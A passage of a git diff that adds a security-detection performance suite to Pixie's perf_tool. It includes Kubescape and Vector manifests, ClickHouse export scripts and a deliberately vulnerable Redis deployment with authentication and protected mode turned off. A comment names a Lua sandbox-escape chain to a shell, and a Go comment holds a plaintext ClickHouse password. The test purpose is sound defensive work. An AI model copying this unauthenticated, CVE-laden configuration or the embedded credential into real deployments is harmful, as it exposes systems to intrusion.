vector/templates/daemonset.yaml +apiVersion: apps/v1 +kind: DaemonSet +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +spec: + selector: + matchLabels: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + minReadySeconds: 0 + template: + metadata: + annotations: + checksum/config: 6840eb68ad4549d7f15ba76da2b37fd179c92f96d58d1ae0f60ff90a4b9e5554 + labels: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + vector.dev/exclude: "true" + spec: + serviceAccountName: vector + dnsPolicy: ClusterFirst + containers: + - name: vector + image: "timberio/vector:0.54.0-distroless-libc" + imagePullPolicy: IfNotPresent + args: + - --config-dir + - /etc/vector/ + env: + - name: VECTOR_LOG + value: "info" + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: VECTOR_SELF_NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: VECTOR_SELF_POD_NAME + valueFrom: + fieldRef: + fieldPath: metadata.name + - name: VECTOR_SELF_POD_NAMESPACE + valueFrom: + 
fieldRef: + fieldPath: metadata.namespace + - name: PROCFS_ROOT + value: "/host/proc" + - name: SYSFS_ROOT + value: "/host/sys" + ports: + - name: api + containerPort: 8686 + protocol: TCP + resources: + limits: + cpu: 200m + memory: 128Mi + requests: + cpu: 50m + memory: 64Mi + volumeMounts: + - name: data + mountPath: "/vector-data-dir" + - name: config + mountPath: "/etc/vector/" + readOnly: true + - mountPath: /var/log/ + name: var-log + readOnly: true + - mountPath: /var/lib + name: var-lib + readOnly: true + - mountPath: /host/proc + name: procfs + readOnly: true + - mountPath: /host/sys + name: sysfs + readOnly: true + terminationGracePeriodSeconds: 60 + tolerations: + - operator: Exists + volumes: + - name: config + projected: + sources: + - configMap: + name: vector + - name: data + hostPath: + path: "/var/lib/vector" + - hostPath: + path: /var/log/ + name: var-log + - hostPath: + path: /var/lib/ + name: var-lib + - hostPath: + path: /proc + name: procfs + - hostPath: + path: /sys + name: sysfs diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml new file mode 100644 index 00000000000..433d5a1fd35 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml @@ -0,0 +1,145 @@ +# Kubescape ApplicationProfile for the vulnerable redis deployment used by the +# sovereign-soc perf_tool suite. This profile is pre-populated (no learning +# phase needed) so that attacks fired against redis trigger anomaly alerts +# immediately. The profile shape is taken verbatim from the sovereignsocdemo +# playground startup file: +# https://github.com/k8sstormcenter/sovereignsocdemo/blob/main/index.md +# (section "playground.startupFiles[/home/laborant/redis-sbob.yaml]") +# +# Apache-2.0 licensed alongside the upstream demo. 
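Since the anomaly rules with a profileDependency only fire if this profile exists before the attack starts, it can be worth probing for it from Go before kicking off a run. A hedged client-go sketch, not part of the patch: the `applicationprofiles` plural is inferred from the kind, and kubeconfig discovery is simplified to the default home path.

```go
package main

import (
	"context"
	"fmt"

	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"k8s.io/apimachinery/pkg/runtime/schema"
	"k8s.io/client-go/dynamic"
	"k8s.io/client-go/tools/clientcmd"
)

func main() {
	cfg, err := clientcmd.BuildConfigFromFlags("", clientcmd.RecommendedHomeFile)
	if err != nil {
		panic(err)
	}
	dyn, err := dynamic.NewForConfig(cfg)
	if err != nil {
		panic(err)
	}
	// GVR inferred from the manifest's apiVersion/kind; the plural
	// "applicationprofiles" is an assumption.
	gvr := schema.GroupVersionResource{
		Group:    "spdx.softwarecomposition.kubescape.io",
		Version:  "v1beta1",
		Resource: "applicationprofiles",
	}
	ap, err := dyn.Resource(gvr).Namespace("redis").Get(context.Background(), "redis", metav1.GetOptions{})
	if err != nil {
		// Profile missing: profile-dependent rules would stay silent.
		panic(err)
	}
	fmt.Println("found ApplicationProfile:", ap.GetName())
}
```

The profile manifest itself follows.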
+apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1 +kind: ApplicationProfile +metadata: + name: redis + namespace: redis +spec: + architectures: + - amd64 + containers: + - capabilities: + - CAP_CHOWN + - CAP_DAC_OVERRIDE + - CAP_DAC_READ_SEARCH + - CAP_SETGID + - CAP_SETPCAP + - CAP_SETUID + - CAP_SYS_ADMIN + endpoints: null + execs: + - args: + - /usr/local/bin/redis-cli + - ping + path: /usr/local/bin/redis-cli + identifiedCallStacks: null + imageID: ghcr.io/k8sstormcenter/redis-vulnerable@sha256:aec7a0c5713a190ed4e02b30a9f066cb1d7137531d8c3bca21c2781ca8a7d945 + imageTag: ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10 + name: redis + opens: + - flags: + - O_CLOEXEC + - O_RDONLY + path: /etc/group + - flags: + - O_CLOEXEC + - O_RDONLY + path: /etc/ld.so.cache + - flags: + - O_CLOEXEC + - O_RDONLY + path: /etc/passwd + - flags: + - O_CLOEXEC + - O_RDONLY + path: /proc/⋯ + - flags: + - O_CLOEXEC + - O_RDONLY + path: /proc/⋯/kernel/* + - flags: + - O_CLOEXEC + - O_RDONLY + path: /proc/⋯/setgroups + - flags: + - O_RDONLY + path: /proc/⋯/stat + - flags: + - O_CLOEXEC + - O_RDONLY + - O_WRONLY + path: /proc/⋯/task/* + - flags: + - O_CLOEXEC + - O_RDONLY + path: /⋯/kernel/* + - flags: + - O_CLOEXEC + - O_RDONLY + path: /⋯/setgroups + - flags: + - O_CLOEXEC + - O_RDONLY + path: /runc + - flags: + - O_RDONLY + path: /⋯/stat + - flags: + - O_CLOEXEC + - O_RDONLY + - O_WRONLY + path: /⋯/task/* + - flags: + - O_RDONLY + path: /sys/kernel/mm/transparent_hugepage/hpage_pmd_size + - flags: + - O_CLOEXEC + - O_RDONLY + path: /sys/fs/cgroup/* + - flags: + - O_CLOEXEC + - O_RDONLY + path: /usr/lib/x86_64-linux-gnu/libc.so.6 + - flags: + - O_CLOEXEC + - O_RDONLY + path: /usr/lib/x86_64-linux-gnu/libm.so.6 + rulePolicies: + R0002: + processAllowed: + - runc + - "runc:[2:INIT]" + seccompProfile: + spec: + defaultAction: "" + syscalls: + - accept4 + - access + - arch_prctl + - brk + - close + - connect + - epoll_ctl + - epoll_wait + - exit_group + - fcntl + - getpid + - getrandom + - ioctl + - mmap + - mprotect + - munmap + - newfstatat + - openat + - poll + - pread64 + - prlimit64 + - read + - recvfrom + - rseq + - sendto + - set_robust_list + - set_tid_address + - setsockopt + - socket + - uname + - write + - writev diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml new file mode 100644 index 00000000000..71350566d9c --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml @@ -0,0 +1,206 @@ +# Pinned copy of upstream k8sstormcenter/bob@68fbfb83dc63f4e0184ecbf66d9c5f251a74b0b7 +# example/redis-vulnerable.yaml (Apache-2.0 licensed). +# +# Redis 7.2.10 — vulnerable to CVE-2025-49844 + CVE-2022-0543 +# +# CVE-2025-49844: Use-After-Free in Lua parser lparser.c (all Redis < 7.2.11) +# CVE-2022-0543: Lua sandbox escape via package.loadlib (Debian packaging issue) +# +# This uses a custom image built from Dockerfile.redis-vulnerable that patches +# the Lua sandbox to reproduce the CVE-2022-0543 condition, enabling full +# sandbox escape via EVAL → package.loadlib → io.popen → shell. 
+# +# Deploys into its own "redis" namespace with: +# Namespace, ServiceAccount, Role, RoleBinding, Deployment, Service +--- +apiVersion: v1 +kind: Namespace +metadata: + name: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/part-of: bob-cve-2025-49844 +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: redis + namespace: redis +rules: + - apiGroups: [""] + resources: ["pods"] + verbs: ["get", "list"] +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: redis + namespace: redis +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: redis +subjects: + - kind: ServiceAccount + name: redis + namespace: redis +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: redis-config + namespace: redis +data: + redis.conf: | + # Disable protected mode (no auth, no bind restriction) + protected-mode no + bind 0.0.0.0 + port 6379 + + # Persistence off — ephemeral for testing + save "" + appendonly no + + # Memory limit + maxmemory 256mb + maxmemory-policy allkeys-lru + + # Logging + loglevel notice +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/version: "7.2.10" + cve: CVE-2025-49844 +spec: + replicas: 1 + selector: + matchLabels: + app.kubernetes.io/name: redis + template: + metadata: + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/version: "7.2.10" + spec: + serviceAccountName: redis + containers: + - name: redis + image: ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10 + command: ["redis-server", "/etc/redis/redis.conf"] + ports: + - containerPort: 6379 + name: redis + protocol: TCP + volumeMounts: + - name: config + mountPath: /etc/redis + readOnly: true + resources: + requests: + cpu: 250m + memory: 256Mi + limits: + cpu: "1" + memory: 512Mi + livenessProbe: + exec: + command: ["redis-cli", "ping"] + initialDelaySeconds: 5 + periodSeconds: 10 + readinessProbe: + exec: + command: ["redis-cli", "ping"] + initialDelaySeconds: 3 + periodSeconds: 5 + volumes: + - name: config + configMap: + name: redis-config +--- +apiVersion: v1 +kind: Service +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis +spec: + type: ClusterIP + selector: + app.kubernetes.io/name: redis + ports: + - port: 6379 + targetPort: 6379 + protocol: TCP + name: redis +--- +# A second Service exposing Redis on a non-standard port (16379 → 6379). +# Used by the endpoint test: if the ApplicationProfile records port=0 (wildcard), +# connections on ANY port are considered "normal" — including this one. +# If the profile records only :6379, connections via :16379 should be anomalous. +apiVersion: v1 +kind: Service +metadata: + name: redis-alt-port + namespace: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/component: endpoint-test +spec: + type: ClusterIP + selector: + app.kubernetes.io/name: redis + ports: + - port: 16379 + targetPort: 6379 + protocol: TCP + name: redis-alt +--- +# Redis client pod — a separate workload that connects to Redis over the network. 
+# Attacks from this pod simulate a compromised application in the cluster: +# - Network traffic is real pod-to-pod (not port-forward from outside) +# - Node-agent sees the TCP connection in its eBPF hooks +# - Endpoint detection can verify port-based allowlisting +apiVersion: apps/v1 +kind: Deployment +metadata: + name: redis-client + namespace: redis + labels: + app.kubernetes.io/name: redis-client + app.kubernetes.io/component: endpoint-test +spec: + replicas: 1 + selector: + matchLabels: + app.kubernetes.io/name: redis-client + template: + metadata: + labels: + app.kubernetes.io/name: redis-client + spec: + containers: + - name: client + image: redis:7.2-alpine + command: ["sleep", "infinity"] + resources: + requests: + cpu: 50m + memory: 32Mi + limits: + cpu: 200m + memory: 64Mi diff --git a/src/e2e_test/perf_tool/pkg/suites/metrics.go b/src/e2e_test/perf_tool/pkg/suites/metrics.go index aaa7d75bbd0..f431af7d933 100644 --- a/src/e2e_test/perf_tool/pkg/suites/metrics.go +++ b/src/e2e_test/perf_tool/pkg/suites/metrics.go @@ -37,6 +37,25 @@ var heapSizeScript string //go:embed scripts/http_data_loss.pxl var httpDataLossScript string +//go:embed scripts/clickhouse_export.pxl +var clickhouseExportScript string + +//go:embed scripts/clickhouse_read.pxl +var clickhouseReadScript string + +//go:embed scripts/forensic_alerts.pxl +var forensicAlertsScript string + +// ClickHouseOperatorPromRecorderName is the canonical name used by the CLI's +// --prom_recorder_override flag to retarget the ClickHouse operator scraper at +// a different cluster (kubeconfig/kube_context). +const ClickHouseOperatorPromRecorderName = "clickhouse-operator" + +// KubescapeNodeAgentPromRecorderName is the canonical name used by the CLI's +// --prom_recorder_override flag to retarget the kubescape node-agent scraper +// at a different cluster. +const KubescapeNodeAgentPromRecorderName = "kubescape-node-agent" + // ProcessStatsMetrics adds a metric spec that collects process stats such as rss,vsize, and cpu_usage. func ProcessStatsMetrics(period time.Duration) *pb.MetricSpec { return &pb.MetricSpec{ @@ -133,6 +152,169 @@ func ProtocolLoadtestPromMetrics(scrapePeriod time.Duration) *pb.MetricSpec { } } +// ClickHouseExportLoadMetric runs the clickhouse export PxL script on a tight +// period to drive load against the ClickHouse write path, and reports the +// row count of each export as a metric. sourceTable is the Pixie events +// table the script reads from (e.g. "http_events", "redis_events"); +// destTable is the ClickHouse destination table. Their column shapes must +// be compatible or Kelvin will crash on the first CH server-side column +// mismatch (see ClickHouseExportSinkNode TODO). 
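For orientation before the function itself: the sovereign-soc experiment further down this diff calls this with source and destination both set to redis_events. Roughly, as a sketch written as if inside package suites (reusing its existing pb and time imports; values mirror sovereignSOCSuite below):

```go
// exampleClickHouseExportSpec shows the call shape used by
// SovereignSOCRedisAttackExperiment.
func exampleClickHouseExportSpec() *pb.MetricSpec {
	return ClickHouseExportLoadMetric(
		5*time.Second, // period: re-run the export PxL script every 5s
		"pixie:pixie_password@clickhouse.forensic.austrianopencloudcommunity.org:9000/default",
		"redis_events", // sourceTable the script reads from
		"redis_events", // destTable: same shape, so CH accepts the INSERT
		30*time.Second, // window: each invocation exports the trailing 30s
	)
}
```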
+func ClickHouseExportLoadMetric(period time.Duration, dsn string, sourceTable string, destTable string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: clickhouseExportScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "source_table": sourceTable, + "dest_table": destTable, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("row_count", "clickhouse_export_rows"), + }, + }, + }, + }, + }, + } +} + +// ClickHouseReadLoadMetric runs the clickhouse read PxL script on a tight +// period to drive load against the ClickHouse read path, and reports the +// row count of each readback as a metric. +func ClickHouseReadLoadMetric(period time.Duration, dsn string, table string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: clickhouseReadScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "table": table, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("row_count", "clickhouse_read_rows"), + }, + }, + }, + }, + }, + } +} + +// ClickHouseOperatorMetrics scrapes the Altinity clickhouse-operator's +// metrics-exporter sidecar (`ch-metrics` port 8888), which proxies per-shard +// ClickHouse server metrics. Named so the --prom_recorder_override CLI flag +// can point it at a different cluster via kubeconfig/kube_context. +func ClickHouseOperatorMetrics(scrapePeriod time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_Prom{ + Prom: &pb.PrometheusScrapeSpec{ + Name: ClickHouseOperatorPromRecorderName, + Namespace: "clickhouse", + MatchLabelKey: "app.kubernetes.io/name", + MatchLabelValue: "altinity-clickhouse-operator", + Port: 8888, + ScrapePeriod: types.DurationProto(scrapePeriod), + MetricNames: map[string]string{ + // Gauges: in-flight load on CH servers. + "chi_clickhouse_metric_Query": "clickhouse_active_queries", + "chi_clickhouse_metric_TCPConnection": "clickhouse_tcp_connections", + "chi_clickhouse_metric_HTTPConnection": "clickhouse_http_connections", + "chi_clickhouse_metric_MemoryTracking": "clickhouse_memory_tracking_bytes", + "chi_clickhouse_metric_BackgroundMergesAndMutationsPoolTask": "clickhouse_background_merge_tasks", + "chi_clickhouse_metric_PartsActive": "clickhouse_parts_active", + // Counters: throughput and errors. + "chi_clickhouse_event_Query": "clickhouse_queries_total", + "chi_clickhouse_event_InsertedRows": "clickhouse_inserted_rows_total", + "chi_clickhouse_event_SelectedRows": "clickhouse_selected_rows_total", + "chi_clickhouse_event_FailedQuery": "clickhouse_failed_queries_total", + "chi_clickhouse_event_NetworkSendBytes": "clickhouse_network_send_bytes_total", + "chi_clickhouse_event_NetworkReceiveBytes": "clickhouse_network_receive_bytes_total", + // Per-table gauges: storage-side pressure. 
+ "chi_clickhouse_table_parts_rows": "clickhouse_table_parts_rows", + "chi_clickhouse_table_parts_bytes": "clickhouse_table_parts_bytes", + }, + }, + }, + } +} + +// KubescapeNodeAgentMetrics scrapes the Kubescape node-agent DaemonSet +// (the component that runs eBPF hooks and emits runtime anomaly alerts). +// Metrics are exposed on port 8080 of pods with label `app=node-agent` in +// the `honey` namespace, matching the kubescape helm chart defaults. +// +// Named so the --prom_recorder_override CLI flag can point it at a +// different cluster via kubeconfig/kube_context. +func KubescapeNodeAgentMetrics(scrapePeriod time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_Prom{ + Prom: &pb.PrometheusScrapeSpec{ + Name: KubescapeNodeAgentPromRecorderName, + Namespace: "honey", + MatchLabelKey: "app", + MatchLabelValue: "node-agent", + Port: 8080, + ScrapePeriod: types.DurationProto(scrapePeriod), + // Whitelist is a superset: prometheus_recorder silently drops + // metrics that are not present in the source, so listing a + // candidate name that a particular kubescape version has not + // (yet) exposed is harmless. + MetricNames: map[string]string{ + // Standard Go/process exporters — always present. + "process_cpu_seconds_total": "kubescape_node_agent_cpu_seconds_total", + "process_resident_memory_bytes": "kubescape_node_agent_rss", + "process_virtual_memory_bytes": "kubescape_node_agent_vsize", + "go_goroutines": "kubescape_node_agent_goroutines", + // Kubescape-specific (names may vary across versions). + "kubescape_ruleengine_firing_alerts_total": "kubescape_firing_alerts_total", + "kubescape_ruleengine_applied_rules_total": "kubescape_applied_rules_total", + "kubescape_node_agent_events_seen_total": "kubescape_events_seen_total", + "kubescape_node_agent_events_dropped_total": "kubescape_events_dropped_total", + }, + }, + }, + } +} + +// ForensicAlertCountMetric runs a PxL script against the forensic +// ClickHouse cluster (via clickhouse_dsn=…) to count Kubescape anomaly +// alerts that Vector has landed in forensic_db.kubescape_logs. Emits one +// row per invocation with the total count over the windowed time range. +func ForensicAlertCountMetric(period time.Duration, dsn string, table string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: forensicAlertsScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "table": table, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("alert_count", "forensic_alert_count"), + }, + }, + }, + }, + }, + } +} + func singleMetricOutputWithPodNodeName(col string, newName ...string) *pb.PxLScriptOutputSpec { metricName := col if len(newName) > 0 { diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl new file mode 100644 index 00000000000..895eb45a0b9 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl @@ -0,0 +1,47 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# Exports a windowed slice of a Pixie events table to ClickHouse on every +# invocation, producing sustained load on the export path. px._pem_hostname() +# ensures the Map runs on the PEM so each row carries the correct hostname. +# +# source_table: the Pixie events table to read from (e.g. http_events, +# redis_events). dest_table: the ClickHouse destination table name. These +# must have compatible column shapes — exporting http_events rows to a +# pre-existing CH table created for redis_events will make the CH server +# reject the INSERT on the first column mismatch, and the clickhouse-cpp +# client will rethrow that as an uncaught std::exception, crashing Kelvin +# (see ClickHouseExportSinkNode TODO). + +import px + +df = px.DataFrame('{{.TemplateValues.source_table}}', start_time='-{{.TemplateValues.window}}') +df.hostname = px._pem_hostname() +px.export(df, px.otel.ClickHouseRows( + table='{{.TemplateValues.dest_table}}', + endpoint=px.otel.Endpoint( + url='{{.TemplateValues.dsn}}', + ), +)) + +# Emit one metric row per invocation so we can chart export cadence and row +# counts. The metric recorder will pick up row_count as a single metric. +metric_df = df.groupby([]).agg(row_count=('time_', px.count)) +metric_df.timestamp = px.now() +metric_df.node_name = px._exec_hostname() +metric_df.pod = 'clickhouse-export-driver' +metric_df = metric_df[['timestamp', 'node_name', 'pod', 'row_count']] +px.display(metric_df, 'export_stats') diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl new file mode 100644 index 00000000000..8975e21e879 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl @@ -0,0 +1,37 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# Reads a windowed slice of http_events back from ClickHouse on every +# invocation, exercising the ClickHouse read path and Pixie's ClickHouse +# source plan. Emits a metric row reporting the number of rows returned so +# we can track read throughput. + +import px + +df = px.DataFrame( + '{{.TemplateValues.table}}', + clickhouse_dsn='{{.TemplateValues.dsn}}', + start_time='-{{.TemplateValues.window}}', +) + +# A light-weight aggregation ensures ClickHouse actually has to scan the +# window rather than just serving the first page of rows. 
+metric_df = df.groupby([]).agg(row_count=('time_', px.count)) +metric_df.timestamp = px.now() +metric_df.node_name = px._exec_hostname() +metric_df.pod = 'clickhouse-read-driver' +metric_df = metric_df[['timestamp', 'node_name', 'pod', 'row_count']] +px.display(metric_df, 'read_stats') diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl new file mode 100644 index 00000000000..ea67958f247 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl @@ -0,0 +1,40 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# Counts Kubescape anomaly alerts that Vector has written into +# forensic_db.alerts in the forensic ClickHouse cluster, windowed on +# event_time. One metric row per rule_id per invocation so the recorder can +# tag it as a per-rule series. + +import px + +df = px.DataFrame( + '{{.TemplateValues.table}}', + clickhouse_dsn='{{.TemplateValues.dsn}}', + start_time='-{{.TemplateValues.window}}', +) + +# forensic_db.kubescape_logs has (per the demo's observe.pxl probe) +# top-level columns: message, RuntimeK8sDetails, event_time. There is no +# top-level RuleID column — the rule id lives inside the JSON `message` +# payload. We just count total alerts in the window; per-rule breakdowns +# are left to downstream analysis. +df = df.agg(alert_count=('event_time', px.count)) +df.timestamp = px.now() +df.node_name = px._exec_hostname() +df.pod = 'forensic-alert-driver' +df = df[['timestamp', 'node_name', 'pod', 'alert_count']] +px.display(df, 'forensic_alert_stats') diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl new file mode 100644 index 00000000000..cdd2c39e354 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl @@ -0,0 +1,25 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# +# SPDX-License-Identifier: Apache-2.0 + +import px + +df = px.DataFrame('redis_events', start_time='-30s') +df.namespace = df.ctx['namespace'] +df = df[df.namespace == '{{.Namespace}}'] + +df = df.agg(count=('time_', px.count)) +df.success = (df.count > 0) +px.display(df[['success']]) diff --git a/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go b/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go new file mode 100644 index 00000000000..db30a7fc449 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go @@ -0,0 +1,329 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package suites + +import ( + // Embed import is required to use go:embed directive. + _ "embed" + "fmt" + "strings" + "text/template" + "time" + + "github.com/gogo/protobuf/types" + log "github.com/sirupsen/logrus" + + pb "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" +) + +// Paths are resolved relative to the pixie workspace root; run.go chdirs +// there at startup via BUILD_WORKSPACE_DIRECTORY / `git rev-parse +// --show-toplevel`, so the perf_tool binary always sees these files +// regardless of where the user invoked bazel run from. +const ( + sovereignSOCYAMLRoot = "src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc" +) + +//go:embed scripts/healthcheck/redis_data_in_namespace.pxl +var redisDataInNamespaceScript string + +// KubescapeVectorWorkload installs Kubescape (eBPF runtime-detection node +// agent + storage + operator) and Vector (DaemonSet shipping Kubescape node- +// agent logs into ClickHouse) on the experiment cluster. Manifests are +// pre-rendered from upstream Helm charts so PrerenderedDeploy can apply them +// statically — see k8s/sovereign-soc/helm-rendered/README.md for the +// re-render recipe. +// +// Treated as long-lived infrastructure (similar to the cert-manager +// prerequisite of the k8ssandra suite). All steps set +// SkipNamespaceDelete=true so teardown never tries to delete `honey` or +// `kube-system`. The first run installs; subsequent runs idempotently +// re-apply (Pixie's ApplyResources skips with IsAlreadyExists or falls +// through to Update). Manual cleanup is only required if you change the +// rendered YAML in a backwards-incompatible way. +// +// The workload is tagged with action_selector="infra" and the experiment +// schedules a START_WORKLOADS{Name:"infra"} action before +// START_METRIC_RECORDERS. That ordering is load-bearing: the kubescape +// node-agent's prometheus exporter is gated by a ConfigMap that this +// workload writes, and the perf_tool's prometheus recorder pre-flights +// port-forwards at recorder-start time. If recorders ran first, they +// would connect to an old node-agent pod with no listener on :8080 and +// the recorder would error out before the experiment even started +// measuring. +// +// Layout: +// 1. 
kubescape.rendered.yaml — honey namespace, main install + 5 CRDs at
+//     the top of the file (rendered with --include-crds so kubescape's
+//     `crds/` chart directory is emitted).
+//  2. kubescape.rendered.kube-system.yaml — the one RoleBinding kubescape
+//     needs in kube-system (storage-auth-reader) for API aggregation auth.
+//  3. kubescape-default-rules.yaml — the built-in runtime rule set.
+//  4. vector.rendered.yaml — Vector DaemonSet + RBAC that tails Kubescape
+//     node-agent logs into forensic_db.kubescape_logs. Endpoint is the
+//     external forensic CH URL so any experiment cluster can write to it.
+func KubescapeVectorWorkload() *pb.WorkloadSpec {
+	return &pb.WorkloadSpec{
+		Name:           "kubescape-vector",
+		ActionSelector: SovereignSOCInfraSelector,
+		DeploySteps: []*pb.DeployStep{
+			{
+				DeployType: &pb.DeployStep_Prerendered{
+					Prerendered: &pb.PrerenderedDeploy{
+						YAMLPaths: []string{
+							fmt.Sprintf("%s/helm-rendered/kubescape.rendered.yaml", sovereignSOCYAMLRoot),
+						},
+						SkipNamespaceDelete: true,
+					},
+				},
+			},
+			{
+				DeployType: &pb.DeployStep_Prerendered{
+					Prerendered: &pb.PrerenderedDeploy{
+						YAMLPaths: []string{
+							fmt.Sprintf("%s/helm-rendered/kubescape.rendered.kube-system.yaml", sovereignSOCYAMLRoot),
+						},
+						SkipNamespaceDelete: true,
+					},
+				},
+			},
+			{
+				DeployType: &pb.DeployStep_Prerendered{
+					Prerendered: &pb.PrerenderedDeploy{
+						YAMLPaths: []string{
+							fmt.Sprintf("%s/helm-rendered/kubescape-default-rules.yaml", sovereignSOCYAMLRoot),
+						},
